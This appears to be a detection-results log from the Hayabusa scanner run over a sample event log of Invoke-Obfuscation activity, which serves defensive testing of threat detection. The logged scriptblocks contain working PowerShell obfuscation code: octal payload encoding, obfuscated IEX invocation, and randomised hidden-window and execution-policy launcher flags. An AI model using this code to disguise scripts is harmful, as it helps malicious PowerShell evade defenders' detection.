{$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.258 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"ithout dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedOctalCommand { <# .SYNOPSIS Generates octal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedOctalCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedOctalCommand encodes an input PowerShell scriptblock or path as an octal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInteractive -NoProfil ""( '127f162f151X164B145f55R110_157@163{164f40n47{110R145{154R154f157{40X127B157{162X154f144L41f47R40L55n106{157{162f145@147X162@157X165n156f144L103L157L154_157f162_40L107f162R145f145f156f73_40@127<162_151{164_145{55B110<157X163f164X40X47_117{142f146_165L163f143@141L164n151_157f156R40_122@157{143X153R163R41_47_40R55R106_157f162f145@147n162{157{165B156X144f103B157{154<157L162<40f107<162<145<145_156'.SPlIt( 'LX@fR_Bn{<' ) |% {( [Char] ([Convert]::ToInt16( ( [String]$_),8 ) )) }) -Join''| Invoke-Expression"" C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX(-Join (( 127 ,162 ,151 ,164 , 145 , 55 ,110, 157, 163 , 164 , 40,47 , 110 , 145 , 154 ,154 ,157,40 , 127 ,157,162 , 154,144, 41 , 47 , 40 ,55 ,106 ,157, 162 , 145 , 147,162,157, 165,156 ,144, 103, 157 ,154, 157,162, 40,107 ,162 , 145 , 145 , 156,73 , 40,127 ,162, 151,164 ,145,55 , 110 , 157,163,164 , 40 ,47,117 ,142,146, 165 ,163 , 143 ,141, 164,151 , 157, 156,40,122 ,157, 143 , 153, 163,41, 47,40 ,55 ,106 , 157, 162, 145,147, 162 , 157,165, 156 ,144, 103 , 157,154,157 , 162,40, 107, 162,145, 145,156)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])})) .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 8 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Octal values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.262 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedOctalCommand { <# .SYNOPSIS Generates octal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedOctalCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedOctalCommand encodes an input PowerShell scriptblock or path as an octal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInteractive -NoProfil ""( '127f162f151X164B145f55R110_157@163{164f40n47{110R145{154R154f157{40X127B157{162X154f144L41f47R40L55n106{157{162f145@147X162@157X165n156f144L103L157L154_157f162_40L107f162R145f145f156f73_40@127<162_151{164_145{55B110<157X163f164X40X47_117{142f146_165L163f143@141L164n151_157f156R40_122@157{143X153R163R41_47_40R55R106_157f162f145@147n162{157{165B156X144f103B157{154<157L162<40f107<162<145<145_156'.SPlIt( 'LX@fR_Bn{<' ) |% {( [Char] ([Convert]::ToInt16( ( [String]$_),8 ) )) }) -Join''| Invoke-Expression"" C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 